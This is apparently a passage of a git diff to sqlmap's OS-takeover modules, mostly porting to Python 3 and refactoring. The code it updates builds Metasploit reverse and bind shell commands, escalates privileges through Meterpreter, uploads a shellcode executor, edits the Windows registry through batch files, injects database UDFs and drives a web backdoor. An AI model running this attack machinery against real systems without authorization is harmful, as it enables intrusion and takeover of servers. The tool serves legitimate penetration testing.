debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, it is likely that the the VNC " + debugMsg += "user, it is likely that the VNC " debugMsg += "injection will be successful" logger.debug(debugMsg) @@ -210,7 +206,7 @@ def _selectPayload(self): warnMsg = "by default PostgreSQL on Windows runs as " warnMsg += "postgres user, it is unlikely that the VNC " warnMsg += "injection will be successful" - logger.warn(warnMsg) + logger.warning(warnMsg) elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): choose = True @@ -219,7 +215,7 @@ def _selectPayload(self): warnMsg += "successful because usually Microsoft SQL Server " warnMsg += "%s runs as Network Service " % Backend.getVersion() warnMsg += "or the Administrator is not logged in" - logger.warn(warnMsg) + logger.warning(warnMsg) if choose: message = "what do you want to do?\n" @@ -232,34 +228,31 @@ def _selectPayload(self): if not choice or choice == "2": _payloadStr = "windows/meterpreter" - break elif choice == "3": _payloadStr = "windows/shell" - break elif choice == "1": if Backend.isDbms(DBMS.PGSQL): - logger.warn("beware that the VNC injection might not work") - + logger.warning("beware that the VNC injection might not work") break elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): break - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") + elif not isDigit(choice): + logger.warning("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > 2: - logger.warn("invalid value, it must be 1 or 2") + logger.warning("invalid value, it must be 1 or 2") if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter": warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") warnMsg += "with the Meterpreter payload. Falling back to " warnMsg += "reverse TCP" - logger.warn(warnMsg) + logger.warning(warnMsg) self.connectionStr = "reverse_tcp" @@ -272,7 +265,7 @@ def _selectPort(self): def _selectRhost(self): if self.connectionStr.startswith("bind"): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP + message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP address = readInput(message, default=self.remoteIP) if not address: @@ -288,7 +281,7 @@ def _selectRhost(self): def _selectLhost(self): if self.connectionStr.startswith("reverse"): - message = "what is the local address? [%s] " % self.localIP + message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP address = readInput(message, default=self.localIP) if not address: @@ -315,42 +308,80 @@ def _prepareIngredients(self, encode=True): self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) def _forgeMsfCliCmd(self, exitfunc="process"): - self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=%s" % exitfunc - self._cliCmd += " LPORT=%s" % self.portStr + if kb.oldMsf: + self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=%s" % exitfunc + self._cliCmd += " LPORT=%s" % self.portStr + + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += " DisableCourtesyShell=true" + + self._cliCmd += " E" else: - raise SqlmapDataException("unexpected connection type") + self._cliCmd = "%s -L -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC %s" % exitfunc + self._cliCmd += "; set LPORT %s" % self.portStr + + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += " DisableCourtesyShell=true" + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += "; set DisableCourtesyShell true" - self._cliCmd += " E" + self._cliCmd += "; exploit'" def _forgeMsfCliCmdForSmbrelay(self): self._prepareIngredients(encode=False) - self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=thread" - self._cliCmd += " LPORT=%s" % self.portStr - self._cliCmd += " SRVHOST=%s" % self.lhostStr - self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() + if kb.oldMsf: + self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=thread" + self._cliCmd += " LPORT=%s" % self.portStr + self._cliCmd += " SRVHOST=%s" % self.lhostStr + self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() + + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr + self._cliCmd += " E" else: - raise SqlmapDataException("unexpected connection type") + self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC thread" + self._cliCmd += "; set LPORT %s" % self.portStr + self._cliCmd += "; set SRVHOST %s" % self.lhostStr + self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort() + + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - self._cliCmd += " E" + self._cliCmd += "; exploit'" def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): - self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr) + if kb.oldMsf: + self._payloadCmd = self._msfPayload + else: + self._payloadCmd = "%s -p" % self._msfVenom + + self._payloadCmd += " %s" % self.payloadConnStr self._payloadCmd += " EXITFUNC=%s" % exitfunc self._payloadCmd += " LPORT=%s" % self.portStr @@ -362,13 +393,24 @@ def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): if Backend.isOs(OS.LINUX) and conf.privEsc: self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" - if extra == "BufferRegister=EAX": - self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) + if kb.oldMsf: + if extra == "BufferRegister=EAX": + self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) - if extra is not None: - self._payloadCmd += " %s" % extra + if extra is not None: + self._payloadCmd += " %s" % extra + else: + self._payloadCmd += " X > \"%s\"" % outFile else: - self._payloadCmd += " X > \"%s\"" % outFile + if extra == "BufferRegister=EAX": + self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format) + + if extra is not None: + self._payloadCmd += " %s" % extra + + self._payloadCmd += " > \"%s\"" % outFile + else: + self._payloadCmd += " -f exe > \"%s\"" % outFile def _runMsfCliSmbrelay(self): self._forgeMsfCliCmdForSmbrelay() @@ -378,7 +420,7 @@ def _runMsfCliSmbrelay(self): logger.info(infoMsg) logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) + self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) def _runMsfCli(self, exitfunc): self._forgeMsfCliCmd(exitfunc) @@ -388,7 +430,7 @@ def _runMsfCli(self, exitfunc): logger.info(infoMsg) logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) + self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) def _runMsfShellcodeRemote(self): infoMsg = "running Metasploit Framework shellcode " @@ -416,15 +458,18 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "use espia\n") send_all(proc, "use incognito\n") - # This extension is loaded by default since Metasploit > 3.7 - #send_all(proc, "use priv\n") - # This extension freezes the connection on 64-bit systems - #send_all(proc, "use sniffer\n") + + # This extension is loaded by default since Metasploit > 3.7: + # send_all(proc, "use priv\n") + + # This extension freezes the connection on 64-bit systems: + # send_all(proc, "use sniffer\n") + send_all(proc, "sysinfo\n") send_all(proc, "getuid\n") if conf.privEsc: - print + print() infoMsg = "trying to escalate privileges using Meterpreter " infoMsg += "'getsystem' command which tries different " @@ -433,7 +478,7 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "getsystem\n") - infoMsg = "displaying the list of Access Tokens availables. " + infoMsg = "displaying the list of available Access Tokens. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token' if " infoMsg += "'getsystem' does not success to elevate privileges" @@ -443,8 +488,9 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "getuid\n") def _controlMsfCmd(self, proc, func): + initialized = False + start_time = time.time() stdin_fd = sys.stdin.fileno() - initiated_properly = False while True: returncode = proc.poll() @@ -460,8 +506,8 @@ def _controlMsfCmd(self, proc, func): if IS_WIN: timeout = 3 - inp = "" - start_time = time.time() + inp = b"" + _ = time.time() while True: if msvcrt.kbhit(): @@ -472,64 +518,67 @@ def _controlMsfCmd(self, proc, func): elif ord(char) >= 32: # space_char inp += char - if len(inp) == 0 and (time.time() - start_time) > timeout: + if len(inp) == 0 and (time.time() - _) > timeout: break if len(inp) > 0: try: send_all(proc, inp) - except IOError: + except (EOFError, IOError): # Probably the child has exited pass else: - ready_fds = select([stdin_fd], [], [], 1) + ready_fds = select.select([stdin_fd], [], [], 1) if stdin_fd in ready_fds[0]: try: send_all(proc, blockingReadFromFD(stdin_fd)) - except IOError: + except (EOFError, IOError): # Probably the child has exited pass out = recv_some(proc, t=.1, e=0) - blockingWriteToFD(sys.stdout.fileno(), out) - - # Dirty hack to allow Metasploit integration to be tested - # in --live-test mode - if initiated_properly and conf.liveTest: - try: - send_all(proc, "exit\n") - except TypeError: - continue + blockingWriteToFD(sys.stdout.fileno(), getBytes(out)) # For --os-pwn and --os-bof pwnBofCond = self.connectionStr.startswith("reverse") - pwnBofCond &= "Starting the payload handler" in out + pwnBofCond &= any(_ in out for _ in (b"Starting the payload handler", b"Started reverse")) # For --os-smbrelay - smbRelayCond = "Server started" in out + smbRelayCond = b"Server started" in out if pwnBofCond or smbRelayCond: func() - if "Starting the payload handler" in out and "shell" in self.payloadStr: - if Backend.isOs(OS.WINDOWS): - send_all(proc, "whoami\n") - else: - send_all(proc, "uname -a ; id\n") + timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT - time.sleep(2) - initiated_properly = True + if not initialized: + match = re.search(b"Meterpreter session ([\\d]+) opened", out) - metSess = re.search("Meterpreter session ([\d]+) opened", out) + if match: + self._loadMetExtensions(proc, match.group(1)) - if metSess: - self._loadMetExtensions(proc, metSess.group(1)) + if "shell" in self.payloadStr: + send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n") + time.sleep(2) - except EOFError: - returncode = proc.wait() + initialized = True + elif timeout: + proc.kill() + errMsg = "timeout occurred while attempting " + errMsg += "to open a remote session" + raise SqlmapGenericException(errMsg) - return returncode + except select.error as ex: + # Reference: https://github.com/andymccurdy/redis-py/pull/743/commits/2b59b25bb08ea09e98aede1b1f23a270fc085a9f + if ex.args[0] == errno.EINTR: + continue + else: + return proc.returncode + except (EOFError, IOError): + return proc.returncode + except KeyboardInterrupt: + pass def createMsfShellcode(self, exitfunc, format, extra, encode): infoMsg = "creating Metasploit Framework multi-stage shellcode " @@ -543,28 +592,28 @@ def createMsfShellcode(self, exitfunc, format, extra, encode): self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra) logger.debug("executing local command: %s" % self._payloadCmd) - process = execute(self._payloadCmd, shell=True, stdout=None, stderr=PIPE) + process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) pollProcess(process) payloadStderr = process.communicate()[1] - match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr) + match = re.search(b"(Total size:|Length:|succeeded with size|Final size of exe file:) ([\\d]+)", payloadStderr) if match: payloadSize = int(match.group(2)) if extra == "BufferRegister=EAX": - payloadSize = payloadSize / 2 + payloadSize = payloadSize // 2 debugMsg = "the shellcode size is %d bytes" % payloadSize logger.debug(debugMsg) else: - errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "") + errMsg = "failed to create the shellcode ('%s')" % getText(payloadStderr).replace("\n", " ").replace("\r", "") raise SqlmapFilePathException(errMsg) self._shellcodeFP = open(self._shellcodeFilePath, "rb") - self.shellcodeString = self._shellcodeFP.read() + self.shellcodeString = getText(self._shellcodeFP.read()) self._shellcodeFP.close() os.unlink(self._shellcodeFilePath) @@ -574,24 +623,40 @@ def uploadShellcodeexec(self, web=False): if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") + content = decloak(self.shellcodeexecLocal) + if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: + content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, getBytes(randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))) + _ = cloak(data=content) + handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") + os.close(handle) + with open(self.shellcodeexecLocal, "w+b") as f: + f.write(_) else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") - if web: - self.shellcodeexecRemote = "%s/%s" % (self.webDirectory, __basename) - else: - self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) - + self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) if web: - self.webUpload(self.shellcodeexecRemote, self.webDirectory, filepath=self.shellcodeexecLocal) + written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) + else: + written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading shellcodeexec. It " + errMsg += "looks like the binary file has not been written " + errMsg += "on the database underlying file system or an AV has " + errMsg += "flagged it as malicious and removed it" + logger.error(errMsg) + + return False else: - self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary") + logger.info("shellcodeexec successfully uploaded") + return True def pwn(self, goUdf=False): if goUdf: @@ -621,9 +686,9 @@ def smb(self): self._runMsfCliSmbrelay() if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile) + self.uncPath = r"\\\\%s\\%s" % (self.lhostStr, self._randFile) else: - self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile) + self.uncPath = r"\\%s\%s" % (self.lhostStr, self._randFile) debugMsg = "Metasploit Framework console exited with return " debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 77491cd8bfc..5abec5fabc3 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -1,17 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os +from lib.core.common import openFile from lib.core.common import randomStr from lib.core.data import conf from lib.core.data import logger +from lib.core.enums import REGISTRY_OPERATION -class Registry: +class Registry(object): """ This class defines methods to read and write Windows registry keys """ @@ -32,28 +34,28 @@ def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" self._batRead = ( - "@ECHO OFF\r\n", - readParse, - ) + "@ECHO OFF\r\n", + readParse, + ) self._batAdd = ( - "@ECHO OFF\r\n", - "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), - ) + "@ECHO OFF\r\n", + "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), + ) self._batDel = ( - "@ECHO OFF\r\n", - "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), - ) + "@ECHO OFF\r\n", + "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), + ) def _createLocalBatchFile(self): - self._batPathFp = open(self._batPathLocal, "w") + self._batPathFp = openFile(self._batPathLocal, "w") - if self._operation == "read": + if self._operation == REGISTRY_OPERATION.READ: lines = self._batRead - elif self._operation == "add": + elif self._operation == REGISTRY_OPERATION.ADD: lines = self._batAdd - elif self._operation == "delete": + elif self._operation == REGISTRY_OPERATION.DELETE: lines = self._batDel for line in lines: @@ -65,12 +67,12 @@ def _createRemoteBatchFile(self): logger.debug("creating batch file '%s'" % self._batPathRemote) self._createLocalBatchFile() - self.writeFile(self._batPathLocal, self._batPathRemote, "text") + self.writeFile(self._batPathLocal, self._batPathRemote, "text", forceCheck=True) os.unlink(self._batPathLocal) def readRegKey(self, regKey, regValue, parse=False): - self._operation = "read" + self._operation = REGISTRY_OPERATION.READ Registry._initVars(self, regKey, regValue, parse=parse) self._createRemoteBatchFile() @@ -90,7 +92,7 @@ def readRegKey(self, regKey, regValue, parse=False): return data def addRegKey(self, regKey, regValue, regType, regData): - self._operation = "add" + self._operation = REGISTRY_OPERATION.ADD Registry._initVars(self, regKey, regValue, regType, regData) self._createRemoteBatchFile() @@ -103,7 +105,7 @@ def addRegKey(self, regKey, regValue, regType, regData): self.delRemoteFile(self._batPathRemote) def delRegKey(self, regKey, regValue): - self._operation = "delete" + self._operation = REGISTRY_OPERATION.DELETE Registry._initVars(self, regKey, regValue) self._createRemoteBatchFile() diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index 8375f2a4d99..36192805ea5 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -1,26 +1,28 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.agent import agent -from lib.core.common import dataToStdout from lib.core.common import Backend -from lib.core.common import isTechniqueAvailable +from lib.core.common import checkFile +from lib.core.common import dataToStdout +from lib.core.common import isDigit +from lib.core.common import isStackingAvailable from lib.core.common import readInput +from lib.core.common import unArrayizeValue +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import logger from lib.core.data import queries -from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import OS -from lib.core.enums import PAYLOAD -from lib.core.common import unArrayizeValue from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapUnsupportedFeatureException @@ -28,7 +30,7 @@ from lib.core.unescaper import unescaper from lib.request import inject -class UDF: +class UDF(object): """ This class defines methods to deal with User-Defined Functions for plugins. @@ -42,12 +44,8 @@ def __init__(self): def _askOverwriteUdf(self, udf): message = "UDF '%s' already exists, do you " % udf message += "want to overwrite it? [y/N] " - output = readInput(message, default="N") - if output and output[0] in ("y", "Y"): - return True - else: - return False + return readInput(message, default='N', boolean=True) def _checkExistUdf(self, udf): logger.info("checking if UDF '%s' already exist" % udf) @@ -112,7 +110,7 @@ def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): return output def udfCheckNeeded(self): - if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: + if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: self.sysUdfs.pop("sys_fileread") if not conf.osPwn: @@ -132,7 +130,7 @@ def udfSetLocalPaths(self): errMsg = "udfSetLocalPaths() method must be defined within the plugin" raise SqlmapUnsupportedFeatureException(errMsg) - def udfCreateFromSharedLib(self, udf=None, inpRet=None): + def udfCreateFromSharedLib(self, udf, inpRet): errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" raise SqlmapUnsupportedFeatureException(errMsg) @@ -147,6 +145,7 @@ def udfInjectCore(self, udfDict): if len(self.udfToCreate) > 0: self.udfSetRemotePath() + checkFile(self.udfLocalFile) written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True) if written is not True: @@ -157,12 +156,13 @@ def udfInjectCore(self, udfDict): message = "do you want to proceed anyway? Beware that the " message += "operating system takeover will fail [y/N] " - choice = readInput(message, default="N") - if choice and choice.lower() == "y": + if readInput(message, default='N', boolean=True): written = True else: return False + else: + return True for udf, inpRet in udfDict.items(): if udf in self.udfToCreate and udf not in self.createdUdf: @@ -188,7 +188,7 @@ def udfInjectCustom(self): logger.error(errMsg) return - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: errMsg = "UDF injection feature requires stacked queries SQL injection" logger.error(errMsg) return @@ -197,19 +197,19 @@ def udfInjectCustom(self): if not self.isDba(): warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" - logger.warn(warnMsg) + warnMsg += "the current session user is not a database administrator" + logger.warning(warnMsg) if not conf.shLib: msg = "what is the local path of the shared library? " while True: - self.udfLocalFile = readInput(msg) + self.udfLocalFile = readInput(msg, default=None, checkBatch=False) if self.udfLocalFile: break else: - logger.warn("you need to specify the local path of the shared library") + logger.warning("you need to specify the local path of the shared library") else: self.udfLocalFile = conf.shLib @@ -238,9 +238,9 @@ def udfInjectCustom(self): msg += "from the shared library? " while True: - udfCount = readInput(msg, default=1) + udfCount = readInput(msg, default='1') - if isinstance(udfCount, basestring) and udfCount.isdigit(): + if udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: @@ -248,23 +248,19 @@ def udfInjectCustom(self): return else: break - - elif isinstance(udfCount, int): - break - else: - logger.warn("invalid value, only digits are allowed") + logger.warning("invalid value, only digits are allowed") - for x in range(0, udfCount): + for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) - udfName = readInput(msg) + udfName = readInput(msg, default=None, checkBatch=False) if udfName: self.udfs[udfName] = {} break else: - logger.warn("you need to specify the name of the UDF") + logger.warning("you need to specify the name of the UDF") if Backend.isDbms(DBMS.MYSQL): defaultType = "string" @@ -273,32 +269,28 @@ def udfInjectCustom(self): self.udfs[udfName]["input"] = [] - default = 1 msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) + msg += "'%s'? (default: 1) " % udfName while True: - parCount = readInput(msg, default=default) + parCount = readInput(msg, default='1') - if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: + if parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break - elif isinstance(parCount, int): - break - else: - logger.warn("invalid value, only digits >= 0 are allowed") + logger.warning("invalid value, only digits >= 0 are allowed") - for y in range(0, parCount): + for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: - parType = readInput(msg, default=defaultType) + parType = readInput(msg, default=defaultType).strip() - if isinstance(parType, basestring) and parType.isdigit(): - logger.warn("you need to specify the data-type of the parameter") + if parType.isdigit(): + logger.warning("you need to specify the data-type of the parameter") else: self.udfs[udfName]["input"].append(parType) @@ -310,8 +302,8 @@ def udfInjectCustom(self): while True: retType = readInput(msg, default=defaultType) - if isinstance(retType, basestring) and retType.isdigit(): - logger.warn("you need to specify the data-type of the return value") + if hasattr(retType, "isdigit") and retType.isdigit(): + logger.warning("you need to specify the data-type of the return value") else: self.udfs[udfName]["return"] = retType break @@ -324,12 +316,12 @@ def udfInjectCustom(self): msg = "do you want to call your injected user-defined " msg += "functions now? [Y/n/q] " - choice = readInput(msg, default="Y") + choice = readInput(msg, default='Y').upper() - if choice[0] in ("n", "N"): + if choice == 'N': self.cleanup(udfDict=self.udfs) return - elif choice[0] in ("q", "Q"): + elif choice == 'Q': self.cleanup(udfDict=self.udfs) raise SqlmapUserQuitException @@ -344,19 +336,20 @@ def udfInjectCustom(self): msg += "\n[q] Quit" while True: - choice = readInput(msg) + choice = readInput(msg, default=None, checkBatch=False).upper() - if choice and choice[0] in ("q", "Q"): + if choice == 'Q': break - elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): + elif isDigit(choice) and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) break - elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): - break else: warnMsg = "invalid value, only digits >= 1 and " warnMsg += "<= %d are allowed" % len(udfList) - logger.warn(warnMsg) + logger.warning(warnMsg) + + if not isinstance(choice, int): + break cmd = "" count = 1 @@ -367,7 +360,7 @@ def udfInjectCustom(self): msg += "%d (data-type: %s)? " % (count, inp) while True: - parValue = readInput(msg) + parValue = readInput(msg, default=None, checkBatch=False) if parValue: if "int" not in inp and "bool" not in inp: @@ -377,16 +370,15 @@ def udfInjectCustom(self): break else: - logger.warn("you need to specify the value of the parameter") + logger.warning("you need to specify the value of the parameter") count += 1 cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: @@ -397,9 +389,8 @@ def udfInjectCustom(self): self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " - choice = readInput(msg, default="Y") - if choice[0] not in ("y", "Y"): + if not readInput(msg, default='Y', boolean=True): break self.cleanup(udfDict=self.udfs) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index be26e1535b1..321840a8e4a 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -1,59 +1,72 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import io import os import posixpath import re -import StringIO - -from tempfile import mkstemp +import tempfile from extra.cloak.cloak import decloak from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import extractRegexResult -from lib.core.common import getDirs -from lib.core.common import getDocRoot +from lib.core.common import getAutoDirectories +from lib.core.common import getManualDirectories from lib.core.common import getPublicTypeMembers from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import ntToPosixSlashes +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import isDigit from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath +from lib.core.common import ntToPosixSlashes +from lib.core.common import openFile +from lib.core.common import parseFilePaths from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexencode -from lib.core.convert import utf8encode +from lib.core.compat import xrange +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths +from lib.core.datatype import OrderedSet from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import OS from lib.core.enums import PAYLOAD -from lib.core.enums import WEB_API +from lib.core.enums import PLACE +from lib.core.enums import WEB_PLATFORM +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import SHELL_RUNCMD_EXE_TAG +from lib.core.settings import SHELL_WRITABLE_DIR_TAG from lib.core.settings import VIEWSTATE_REGEX from lib.request.connect import Connect as Request +from thirdparty.six.moves import urllib as _urllib - -class Web: +class Web(object): """ This class defines web-oriented OS takeover functionalities for plugins. """ def __init__(self): - self.webApi = None + self.webPlatform = None self.webBaseUrl = None self.webBackdoorUrl = None self.webBackdoorFilePath = None @@ -70,11 +83,11 @@ def webBackdoorRunCmd(self, cmd): if not cmd: cmd = conf.osCmd - cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) - page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True) + cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, getUnicode(cmd)) + page, _, _ = Request.getPage(url=cmdUrl, direct=True, 